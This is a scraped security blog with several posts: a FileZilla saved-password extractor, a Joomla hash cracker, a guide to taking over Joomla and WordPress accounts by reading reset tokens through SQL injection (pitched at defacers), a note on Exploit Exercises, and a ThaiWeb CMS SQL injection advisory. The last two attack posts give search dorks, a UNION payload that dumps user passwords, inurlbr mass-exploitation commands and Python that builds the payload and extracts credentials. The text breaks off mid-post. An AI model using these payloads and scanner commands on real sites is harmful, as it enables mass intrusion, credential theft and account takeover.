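```python
"""Audit a FileZilla sitemanager.xml for credentials saved on disk.

Added example for this post; not FileZilla's or inurlbr's code.
Assumptions: the Logontype numbering in LOGON_TYPES matches FileZilla's,
newer releases write <Pass encoding="base64">, older ones clear text.
"""
import base64
import xml.etree.ElementTree as ET

LOGON_TYPES = {
    "0": "Anonymous", "1": "Normal", "2": "Ask for password",
    "3": "Interactive", "4": "Account", "5": "Key file",
}
# Logon types for which FileZilla persists the password in the XML.
SAVES_PASSWORD = {"1", "4"}

# Constructed sample file: hosts, users and passwords are made up.
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.10.0" platform="*nix">
  <Servers>
    <Server>
      <Host>ftp.example.com</Host><Port>21</Port><Protocol>0</Protocol>
      <Type>0</Type><User>webmaster</User>
      <Pass encoding="base64">cDRyNHMxdDNz</Pass>
      <Logontype>1</Logontype><Name>example.com (normal)</Name>
    </Server>
    <Server>
      <Host>ftp.example.org</Host><Port>21</Port><Protocol>0</Protocol>
      <Type>0</Type><User>editor</User>
      <Logontype>2</Logontype><Name>example.org (ask for password)</Name>
    </Server>
    <Server>
      <Host>old.example.net</Host><Port>21</Port><Protocol>0</Protocol>
      <Type>0</Type><User>legacy</User>
      <Pass>plaintext-secret</Pass>
      <Logontype>1</Logontype><Name>legacy (old FileZilla)</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def parse(xml_text):
    """Parse str or bytes; bytes keep the XML encoding declaration valid."""
    if isinstance(xml_text, str):
        xml_text = xml_text.encode("utf-8")
    return ET.fromstring(xml_text)


def is_filezilla_config(xml_text):
    """The -a '<FileZilla3>' test: the root element must be FileZilla3."""
    try:
        return parse(xml_text).tag == "FileZilla3"
    except ET.ParseError:
        return False


def stored_password(pass_el):
    """Return the saved password, decoding the base64 form newer versions write."""
    if pass_el is None or not pass_el.text:
        return None
    if pass_el.get("encoding") == "base64":
        return base64.b64decode(pass_el.text).decode("utf-8", "replace")
    return pass_el.text


def saved_credentials(xml_text):
    """(name, host, user, password, logon type) for every site that keeps a password."""
    root = parse(xml_text)
    if root.tag != "FileZilla3":
        raise ValueError("not a FileZilla3 document")
    found = []
    for server in root.iter("Server"):
        logontype = (server.findtext("Logontype") or "0").strip()
        if logontype not in SAVES_PASSWORD:
            continue
        found.append((
            server.findtext("Name"),
            server.findtext("Host"),
            server.findtext("User"),
            stored_password(server.find("Pass")),
            LOGON_TYPES.get(logontype, logontype),
        ))
    return found


if __name__ == "__main__":
    for name, host, user, password, ltype in saved_credentials(SAMPLE_SITEMANAGER):
        print(f"{name}: {user}@{host} [{ltype}] password={password!r}")
```

Run it against the real file (~/.config/filezilla/sitemanager.xml on Linux, %APPDATA%\FileZilla\sitemanager.xml on Windows) and every line it prints is a site that should be switched to "Ask for password", "Interactive" or key authentication.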
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>References:</b></span><br />
<a href="http://seclists.org/fulldisclosure/2008/Apr/508" target="_blank">http://seclists.org/fulldisclosure/2008/Apr/508</a><br />
<a href="http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/" target="_blank">http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/</a><br />
<a href="http://bl0wj0bb3r.blogspot.com.br/2015/08/d3lphi-filezilla-password-stealer.html" target="_blank">http://bl0wj0bb3r.blogspot.com.br/2015/08/d3lphi-filezilla-password-stealer.html</a><br />
<a href="http://unsharptech.com/2008/05/20/filezilla-ftp-passwords-stored-in-plaintext/" target="_blank">http://unsharptech.com/2008/05/20/filezilla-ftp-passwords-stored-in-plaintext/</a>InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com6tag:blogger.com,1999:blog-5670232360751087799.post-71911731110682014512015-07-30T21:45:00.000-03:002015-07-30T22:03:47.479-03:00Resetting WORDPRESS/JOOMLA passwords via SQL injection <div class="separator" style="clear: both; text-align: center;">
<a href="http://www.w3chacking.com/wp-content/uploads/2012/11/w3ctrlhacking-sql-injection-1140x600.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="[0x00] Introduction. This article is simple but quite useful for the kids who enjoy defacement but do not have much knowledge, and who spend a long time trying to 'crack' a hash from these CMSs." border="0" src="http://www.w3chacking.com/wp-content/uploads/2012/11/w3ctrlhacking-sql-injection-1140x600.jpg" height="336" title="[0x00] Introduction. This article is simple but quite useful for the kids who enjoy defacement but do not have much knowledge, and who spend a long time trying to 'crack' a hash from these CMSs." width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b></b><br />
<div style="text-align: center;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[0x00]</span></b> <b><span style="color: red; font-size: large;">Introduction</span></b></span></b></div>
<b>
</b>
<br />
<div style="text-align: left;">
Right, this article is simple but quite useful for the kids who enjoy defacement but do not have much knowledge, and who spend a long time trying to "crack" a hash from these CMSs.</div>
<b>
</b>
<div style="text-align: left;">
<b><b></b><br /></b>
<div style="text-align: center;">
<b><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[0x01]</span></b> <span style="color: red; font-size: large;">Joomla concept</span></span></b></b></div>
<b><b>
</b></b></div>
<b>
</b><br />
<div style="text-align: left;">
I am not sure we can call it a concept, but the term fits well; if memory serves I have seen a similar article somewhere, I just cannot recall the author.<br />
<br /></div>
<b>[<span style="color: blue;">0x01a</span>] The hash </b><br />
<div>
The hash Joomla 1.x uses is salted MD5: the stored value is md5(password + salt), then a colon, then the salt itself (a 32-character random string in Joomla 1.5). The salt is stored in the clear, so cracking means brute-forcing MD5 with a known salt; only the password is unknown.<br />
<b><br /></b></div>
<div>
<b>[<span style="color: blue;">0x01b</span>] Example:</b><br />
<span style="font-family: Courier New, Courier, monospace;">147c6577fd36d90147c4ee3a5a0cceaa<b>:</b><span style="color: red;">sWTeBV3KGXeCtb6ivBFXKBRhMIJE4O0</span></span> the part in black is the MD5 digest and the part highlighted in <span style="color: red;">red</span> is the salt.</div>
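The format above, as an added example that is not Joomla's code: a Python reimplementation of the Joomla 1.x scheme (MD5 of the password concatenated with the salt, then a colon and the salt), with a verifier and the offline dictionary attack that the reset-token route described in the following sections sidesteps. A stored value with no colon is treated as Joomla 1.0's unsalted MD5. The words and salts used are constructed.

```python
"""Joomla 1.x password hashes: md5(password + salt) ':' salt.

Added example for this post, not Joomla's code. joomla_hash() produces the
stored form, joomla_verify() checks a candidate against it (a legacy value
with no ':' is treated as Joomla 1.0's unsalted md5), and crack() is the
offline dictionary attack the reset-token trick avoids. Words and salts
below are constructed.
"""
import hashlib
import hmac
import secrets
import string

SALT_ALPHABET = string.ascii_letters + string.digits
SALT_LENGTH = 32  # Joomla 1.5 generates a 32-character random salt


def _md5hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def joomla_hash(password, salt=None):
    """Return 'md5hex:salt'; a fresh random salt is drawn when none is given."""
    if salt is None:
        salt = "".join(secrets.choice(SALT_ALPHABET) for _ in range(SALT_LENGTH))
    return f"{_md5hex(password + salt)}:{salt}"


def joomla_verify(password, stored):
    """Constant-time comparison of a candidate password with a stored hash."""
    digest, _, salt = stored.partition(":")
    candidate = _md5hex(password + salt)  # salt is '' for unsalted 1.0 hashes
    return hmac.compare_digest(candidate, digest)


def crack(stored, wordlist):
    """Dictionary attack: the salt is public, so only MD5 speed limits it."""
    for word in wordlist:
        if joomla_verify(word, stored):
            return word
    return None


if __name__ == "__main__":
    stored = joomla_hash("secret", "sWTeBV3KGXeCtb6ivBFXKBRhMIJE4O0x")
    print(stored)
    print("cracked:", crack(stored, ["password", "123456", "secret"]))
```

The salt only stops precomputed tables; it does nothing against a per-hash brute force, which is why a fast unsalted-style digest such as MD5 is the weak point here regardless of the salt.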
<div>
<b><b></b></b><br />
<div style="text-align: center;">
<b><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[0x02]</span></b> <span style="color: red; font-size: large;">Injection </span></span></b></b></div>
<b><b>
</b></b>
<br />
<div style="text-align: left;">
It is much like an ordinary SQL injection; we only change the tables and columns we go after. Normally we would be after the columns holding the username and password, but this time we look for the table holding the activation codes and e-mail addresses.<br />
<br /></div>
<div style="text-align: left;">
<b>[<span style="color: blue;">0x02b</span>] Target table</b></div>
<div style="text-align: left;">
The target is the users table: the prefix varies (jos_ by default), but in the vast majority of cases the name ends in _users, and we take the email and activation columns.</div>
<div style="text-align: left;">
Take the e-mail address and submit it at <span style="color: blue;"><span style="font-family: Courier New, Courier, monospace;"><b>alvo.ru/index.php?option=com_user&view=reset</b></span> </span>(alvo.ru is the target; com_user is the Joomla 1.5 component). After that, enter the code read from the activation column and you will be able to choose a new password.</div>
<div style="text-align: left;">
<b></b></div>
<div>
<b></b><br />
<div style="text-align: center;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[0x03]</span></b> <span style="color: red; font-size: large;">WordPress concept</span></span></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
<i>Not much changes from the Joomla injection; WordPress just uses a different password hash (phpass portable hashes, the strings starting with $P$), which is why going after the reset key beats cracking. </i></div>
<div style="font-weight: bold; text-align: center;">
<br /></div>
<div style="font-weight: bold; text-align: left;">
<b>[<span style="color: blue;">0x03a</span>]</b> Target table and columns</div>
<div style="text-align: left;">
<b> </b> the target table is <b><span style="font-family: Courier New, Courier, monospace;">wp_users</span></b> and the columns are <b><span style="font-family: Courier New, Courier, monospace;">user_login</span></b> and <b><span style="font-family: Courier New, Courier, monospace;">user_activation_key</span></b>.<br />
<br /></div>
<div style="font-weight: bold; text-align: left;">
<b>[<span style="color: blue;">0x03b</span>] Resetting </b></div>
<div>
<b style="font-weight: bold;"> </b>It is much like Joomla; only the path changes, since it is a different CMS. First open <span style="color: blue; font-family: Courier New, Courier, monospace;"><b>alvo.ru/</b></span><span style="color: blue;"><b><span style="font-family: Courier New, Courier, monospace;">wp-login.php?action=lostpassword</span></b> </span>and submit the user whose password we want to change (the name obtained from user_login). After that open <span style="font-family: Courier New, Courier, monospace;"><b>/wp-login.php?action=rp&key=<span style="color: blue;">l33ts</span>&login=<span style="color: red;">h4x0r</span>.</b></span></div>
</div>
</div>
<div>
<b></b><br />
<div style="text-align: center;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[0x04]</span></b> <span style="color: red; font-size: large;">WordPress explained</span></span></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
I believe everyone understood the l33ts and <span style="color: red;"><b>h4x0r</b></span> part, but for the inattentive: where the URL has l33ts you put the corresponding code obtained from <span style="color: red;"><b><span style="font-family: Courier New, Courier, monospace;">user_activation_key</span></b> </span>(read it only after requesting the reset, since that is when WordPress writes it), and where it has h4x0r you put the user obtained from user_login.</div>
<b>
</b></div>
<div>
<b><br /></b></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Solution?</span><br />Keep your CMS up to date and stay informed about new vulnerabilities.</b> Note that WordPress 4.3 started storing user_activation_key as a hash of the reset key rather than the key itself, so on current versions reading the column no longer yields a usable reset link; the injection that exposes the table is the bug to fix in any case.</div>
0x4h4xhttp://www.blogger.com/profile/15701173647037587709noreply@blogger.com2tag:blogger.com,1999:blog-5670232360751087799.post-21951727521538501212015-07-30T20:23:00.002-03:002015-07-30T20:37:34.868-03:00Exploit exercises<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipTGA97Ec0_BqwTyoN68X0Glc7oWCU8EbhC3tX13ipJYoEe6wh5O8xh87H-S1-puEYfP5NF4UFE8SGTMBEz5SPLV-_RGi9bdXy0BUh6-hxKZWJnNVgOyk25tOfUDIUXACm43K21uzSXADt/s1600/hacker-id-theft-dreamstime_l_13516127.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Exploit Exercises is a series of challenges and documentation to help beginners gain knowledge about the various phases of a pentest." border="0" height="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipTGA97Ec0_BqwTyoN68X0Glc7oWCU8EbhC3tX13ipJYoEe6wh5O8xh87H-S1-puEYfP5NF4UFE8SGTMBEz5SPLV-_RGi9bdXy0BUh6-hxKZWJnNVgOyk25tOfUDIUXACm43K21uzSXADt/s640/hacker-id-theft-dreamstime_l_13516127.jpg" title="Exploit Exercises is a series of challenges and documentation to help beginners gain knowledge about the various phases of a pentest." width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b><br /></b></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b><br /></b></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>[0x00] <span style="color: red;">Introduction </span></b></span><br />
<div>
<span style="color: red; font-weight: bold;"><span style="font-size: large;"> </span> </span>Exploit Exercises is a series of challenges and documentation to help beginners gain knowledge about the various phases of a pentest.<br />
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="font-size: large;">[</span><span style="font-size: large;">0x01</span><span style="font-size: large;">] </span><span style="color: red; font-size: large;">How does it work?</span></span></b></div>
<div>
<b> </b>The challenges are built as a set of VMs (virtual machines) plus a wide range of documentation and video lessons.<br />
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="font-size: large;">[</span><span style="font-size: large;">0x02</span><span style="font-size: large;">] </span><span style="color: red;"><span style="font-size: large;">Levels</span></span></span></b></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> [0x02a] <span style="color: blue;">Nebula</span></span></b></div>
<b> </b>The Nebula module introduces local privilege escalation on a Linux system (permissions, SUID binaries and similar weaknesses) and is the right starting point for beginners in privilege escalation; the memory-corruption exercises come in the later modules.<br />
<br />
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> [0x02b] <span style="color: blue;">Protostar </span></span></b></div>
<div>
<span style="color: blue;"> </span>The Protostar module is similar in spirit to Nebula; it introduces network byte order, socket handling, stack overflows, format strings and network programming.<br />
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> [0x02c]</span><span style="color: blue;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> Fusion</span> </span></b></div>
<div>
The Fusion module moves on to exploitation with mitigations in place (ASLR, PIE, NX) and also introduces cryptography and a variety of network protocols.<br />
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b> </b><b>[0x02d] <span style="color: blue;">Main Sequence</span></b></span></div>
<div>
<span style="color: blue;"><b> </b> </span>The Main Sequence module is where things start to get serious; I consider it one of the most decisive modules, since it puts you through a series of tests with pentest-focused tools such as Metasploit and sqlmap, plus binary analysis, reverse engineering, basic cryptanalysis, network protocols and web-focused pentesting.<br />
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b> </b><b>[0x02e] <span style="color: blue;">Cloudroad</span></b></span></div>
<div>
<span style="color: blue; font-weight: bold;"> </span>The final module, Cloudroad, was the name of the capture the flag run at Ruxcon 2014: play and "become" a member of an illegal organisation that sells corporate espionage, write exploits, practise reverse engineering and much more. Unfortunately this module is not yet available.</div>
<div>
<b><br /></b></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="font-size: large;">[</span><span style="font-size: large;">0x03</span><span style="font-size: large;">] <span style="color: red;">Final remarks </span></span></span></b></div>
<div>
<br /></div>
<div>
I tested a few modules and all of them proved fully capable of being a great help to anyone who wants to pass the time or simply start studying this field.</div>
<div>
<b><br /></b></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[</span><span style="font-size: large;">0x04</span><span style="font-size: large;">] </span></b><span style="color: red; font-size: large;"><b>Exploit exercises</b></span></span></div>
<div>
<span style="color: red; font-size: large;"><b> </b></span><b>[0x04a] Download</b></div>
<div>
<b> <a href="https://exploit-exercises.com/" target="_blank">https://exploit-exercises.com/</a></b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
0x4h4xhttp://www.blogger.com/profile/15701173647037587709noreply@blogger.com3tag:blogger.com,1999:blog-5670232360751087799.post-67965490368420607372015-07-25T03:50:00.000-03:002015-07-25T03:55:21.664-03:00ThaiWeb CMS 2015Q3 - SQL Injection Web Vulnerability<h3>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Exploiting the SQL injection in the ThaiWeb CMS, then using the inurlbr scanner for mass exploitation.</span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7yJU4DTvHnGCG2xonl14KZ84YUpfc-4D6mpdmDSO47mO7iX1NHiDWAnoKvyhcP8S84cvuEO-SezIHmAq98MhbDGL3ou00qxOUNT98tS_fCmTPTvh-m_79tCjXK81Jp4yY0NXra40n7qxv/s1600/bwlogos_06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation." border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7yJU4DTvHnGCG2xonl14KZ84YUpfc-4D6mpdmDSO47mO7iX1NHiDWAnoKvyhcP8S84cvuEO-SezIHmAq98MhbDGL3ou00qxOUNT98tS_fCmTPTvh-m_79tCjXK81Jp4yY0NXra40n7qxv/s400/bwlogos_06.jpg" title="Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation." width="400" /></a></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></div>
THAIWEB.network has been a network since Nov 1998 and was reborn in Aug 2003. We provide stable servers for our own usage.<br />
We are located in Bangkok, Thailand. Our systems are based on UNIX and an open-source approach.<br />
<br />
We believe in sharing knowledge, and we hope our knowledge will help everyone develop and reach a higher standard.<br />
We hope to see Thai web builders upgrading themselves to become professionals in the big international world of the internet.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Vulnerability discovered by:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Iran Cyber Security Group - Pi.Hack (<a href="http://www.iran-cyber.org/" target="_blank">www.Iran-Cyber.Org</a>)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Description:</span></b><br />
The vulnerability is located in the id_run parameter of the `index.php` file. <b>Remote</b> attackers are able to execute their own SQL commands by <b>manipulating</b> the vulnerable id_run parameter of a GET request. The <b>request</b> method used to inject the <b><a href="http://blog.inurl.com.br/search/label/sql%20injection" target="_blank">sql command</a></b> is GET and the issue is located on the application side.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">References (Source):</span></b><br />
<a href="http://www.vulnerability-lab.com/get_content.php?id=1555" target="_blank"><span style="font-family: Courier New, Courier, monospace;">http://www.vulnerability-lab.com/get_content.php?id=1555</span></a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Release Date:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">2015-07-23</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Vulnerability Laboratory ID (VL-ID):</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">1555</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Common Vulnerability Scoring System:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">8.6</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Vendor Homepage:</b></span><br />
<a href="http://www.thaiweb.net/" target="_blank"><span style="font-family: Courier New, Courier, monospace;">http://www.thaiweb.net/</span></a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Google Dork:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">"Powered by ThaiWeb"</span><br />
<span style="font-family: Courier New, Courier, monospace;">"Reserved. Powered by Thaiweb."</span><br />
<span style="font-family: Courier New, Courier, monospace;">inurl:"index.php" "Powered by Thaiweb"</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>PoC:</b></span><br />
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">http://target/index.php?Content=product&id_run=</span><i style="font-family: 'Courier New', Courier, monospace;">[ID]'[SQL INJECTION VULNERABILITY!]</i></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">http://target/index.php?Content=product&id_run=</span><i style="font-family: 'Courier New', Courier, monospace;">-12+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--</i></li>
</ul>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Admin Page:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">www.target.com/_adminP/</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Using <a href="http://blog.inurl.com.br/search/label/inurlbr" target="_blank">inurlbr</a> scanner for mass exploitation:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Download script: <a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a></span><br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">- Creating our command</span></b><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET DORK:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">--dork 'YOUR_DORK'</span><br />
<span style="font-family: Courier New, Courier, monospace;">OR</span><br />
<span style="font-family: Courier New, Courier, monospace;">--dork-file 'YOUR_DORK_FILE.txt'</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET SEARCH ENGINES:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-q</b> all</span><br />
we will use all the search engines available in the script (<b>-q</b> is the search-engine switch; <b>-a</b> is the validation string set further down)<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET FILTER RESULTS:</b></span><br />
<b><span style="color: red; font-family: Courier New, Courier, monospace;">--unique</span></b><br />
Filter results to unique domains.<br />
<div>
strips the GET parameters from each URL</div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET OUTPUT FILE:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> <b>-s</b> ThaiWeb.txt </span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET VALIDATION TYPE:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-t</b> 2</span><br />
Type 2 checks the target's response for the string given with <span style="color: red; font-family: Courier New, Courier, monospace;"><i><b>-a</b> 'VALUE_INSIDE_THE_TARGET'</i></span><br />
It also sends the exploit to the target through the GET method.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET EXPLOIT REQUEST - GET:</b></span><br />
--exploit-get {YOUR_GET}<br />
<br />
<i>Before setting the exploit we <b>manipulate</b> its string: inurlbr has an internal <b>function</b> for hex-encoding, which lets us place a <b>validation</b> string inside the SQL injection so that vulnerable targets can be separated from the rest.</i><br />
<br />
Internal function: converting strings to <b>hexadecimal</b><br />
<b>hex</b> encodes a value as hex (this is encoding, not encryption).<br />
Example: <b>hex(</b>{value}<b>)</b><br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;"><b>hex(</b>102030<b>)</b></span><br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get 'user?id=<b>hex(</b>102030<b>)</b>'</span><br />
Resulting request:<br />
http://www.target.gov.br/user?id=313032303330<br />
<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get '/index.php?Content=product&id_run=<i>-12+union+select+1,2,3,group_concat%28user,</i><i>0x</i><b>hex(</b><i>:</i><b>)</b><i>,pws,</i><i>0x</i><b>hex(</b><i>:</i><b>)</b><i>,</i>0x<b>hex(</b><i>inurlbr_vuln</i><b>)%</b><i>29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'</i></span><br />
<br />
<b>hex(inurlbr_vuln)</b> = 696e75726c62725f76756c6e<br />
<b>hex(:)</b> = 3a<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Example injection:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.target.gov.br</span><span style="color: red; font-family: Courier New, Courier, monospace;">/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x<b>3a</b>,pws,0x<b>3a</b>,0x<b>696e75726c62725f76756c6e%</b>29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET STRING VALIDATION:</b></span><br />
Specify the string that will be searched for in the target's response:<br />
Example: <b>-a</b> {string}<br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> '<title>hello world</title>'</span><br />
If the value is found in the response, the target is considered vulnerable.<br />
Setting: <span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> 'inurlbr_vuln'</span><br />
<br />
We validate on the string "<b>inurlbr_vuln</b>" because we passed it (hex-encoded) inside the SQLi <b>exploit</b>: if it shows up in the target's response, the injection was <b>successful</b>. The hex encoding matters for more than filter evasion: the request URL only ever contains the hex literal, so a page that simply echoes its own URL cannot produce a false positive.<br />
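The validation described above, as an added example that is not inurlbr's code: Python that rebuilds the published id_run payload with the marker hex-encoded the way inurlbr's hex() does, assembles the full scanner invocation from the options listed in this post (with -q for the search engines), checks a response body for the marker and pulls the group_concat rows out of it. The response bodies are constructed samples; the `user` table, the `user`/`pws` columns and the 20-column UNION come from the published PoC.

```python
"""Marker-based confirmation of a UNION SQL injection (the -t 2 / -a check).

Added example for this post; not inurlbr's code. The marker travels inside
the query as a 0x... literal, so the URL never carries the literal string
and a page that merely echoes its own URL cannot match. Response bodies
are constructed samples; table and column names follow the published PoC.
"""
import re

MARKER = "inurlbr_vuln"
COLUMNS = 20    # column count of the published UNION
INJECT_COL = 4  # 1-based column the page renders


def to_hex(value):
    """inurlbr's hex(): hex(102030) -> 313032303330, hex(:) -> 3a."""
    return value.encode("utf-8").hex()


def build_payload(marker=MARKER, table="user", fields=("user", "pws")):
    """id_run value: -12+union+select+1,2,3,group_concat(...),5..20+from+user."""
    sep = "0x" + to_hex(":")
    concat = ",".join([fields[0], sep, fields[1], sep, "0x" + to_hex(marker)])
    cols = [str(i) for i in range(1, COLUMNS + 1)]
    cols[INJECT_COL - 1] = "group_concat%28" + concat + "%29"
    return "-12+union+select+" + ",".join(cols) + "+from+" + table


def exploit_get(marker=MARKER):
    """The --exploit-get value, already hex-encoded (no hex() call needed)."""
    return "/index.php?Content=product&id_run=" + build_payload(marker)


def inurlbr_argv(dork, output="ThaiWeb.txt", marker=MARKER):
    """Full scanner invocation assembled from the options above (-q = engines)."""
    return ["php", "inurlbr.php", "--dork", dork, "-q", "all", "--unique",
            "-s", output, "-t", "2", "--exploit-get", exploit_get(marker),
            "-a", marker]


def is_vulnerable(body, marker=MARKER):
    """-t 2 validation: the literal marker appears in the response."""
    return marker in body


def extract_rows(body, marker=MARKER):
    """Return (user, pws) pairs from the group_concat output."""
    pattern = re.compile(r"([^,:<>\s]+):([^,:<>\s]+):" + re.escape(marker))
    return pattern.findall(body)


# Constructed responses: one injectable page, one that just echoes the URL.
VULN_BODY = ("<html><body><table><tr><td>"
             "admin:5f4dcc3b5aa765d61d8327deb882cf99:inurlbr_vuln,"
             "editor:e10adc3949ba59abbe56e057f20f883e:inurlbr_vuln"
             "</td></tr></table></body></html>")
ECHO_BODY = "<html><body>Not found: " + exploit_get() + "</body></html>"


if __name__ == "__main__":
    print(" ".join(inurlbr_argv('"Powered by ThaiWeb"')))
    print(is_vulnerable(VULN_BODY), extract_rows(VULN_BODY))
    print(is_vulnerable(ECHO_BODY))
```

Pick the marker as something that cannot occur in normal page text; the check is a plain substring match, so a marker such as "admin" would flag every login page.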
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>OUTPUT PRINT:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
